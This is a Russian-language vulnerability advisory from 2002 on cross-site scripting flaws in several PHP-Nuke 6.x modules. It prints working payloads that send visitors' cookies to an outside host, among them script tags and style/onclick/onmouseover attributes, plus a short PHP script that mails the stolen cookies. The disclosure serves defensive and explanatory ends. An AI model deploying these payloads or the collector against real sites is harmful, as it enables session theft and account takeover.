Несколько модулей в phpNuke уязвимы к межсайтовому скриптингу

Дата публикации:
29.11.2002
Всего просмотров:
1059
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Nuke 6.x
Описание: phpNuke – популярная система управления содержанием для UNIX и Windows систем. Несколько модулей phpNuke содержат серьезную уязвимость, которая позволяет хакеру похищать или отключать учетные записи пользователя, и возможно получать административные привилегии.

1. Уязвимость в поисковом модуле

Модуль поиска phpNuke не выполняет никакой фильтрации при возвращении "Результатов для x ... " страницы, и в результате восприимчив к межсайтовому скриптингу, через простой запрос типа:

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php
?email=mattmurphy@kc.rr.com&ref="+document.URL+
"cookie="+document.cookie;
2. Уязвимость расширенных тэгов в нескольких модулях

phpNuke выполняет фильтрацию большинства опасных тэгов, но не принимает во внимание, что некоторые "безопасные" тэги могут иметь злонамеренные свойства. Уязвимость позволяет внедрять произвольные код сценария в модули PM, дискуссий, новостей и т.п. В основном любой модуль, который принимает пользовательский ввод для статьи, сообщения, или комментария, может быть атакован с HTML типа:

<B
STYLE="left:expression(eval('location.href=
\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphy@kc.rr.com&ref=
\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href=
'http://www.techie.hopto.org/fetch.php?email=mattmurp
hy@kc.rr.com&ref='+document.URL+'cookie=
'+document.cookie">Don't Click</B>
<B
ONMOUSEOVER="location.href=
'http://www.techie.hopto.org/fetch.php?email=matt
murphy@kc.rr.com&ref=
'+document.URL+'cookie='+document.cookie">Keep
Away!</B>
3. Эксплоит:

<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>
уязвимость обнаружена в phpNuke 6.5b1 и более ранних версиях.

Ссылки: Multiple phpNuke Modules Vulnerable to Cross-Site Scripting
или введите имя

CAPTCHA